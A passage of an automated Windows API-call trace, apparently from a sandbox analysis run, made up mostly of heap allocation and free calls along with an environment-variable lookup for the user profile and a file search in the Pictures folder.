(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0210.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.702] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0210.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.705] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0210.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LloJL.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1708b0, ftCreationTime.dwHighDateTime=0x1d5d177, ftLastAccessTime.dwLowDateTime=0x84499200, ftLastAccessTime.dwHighDateTime=0x1d5cad0, ftLastWriteTime.dwLowDateTime=0x84499200, ftLastWriteTime.dwHighDateTime=0x1d5cad0, 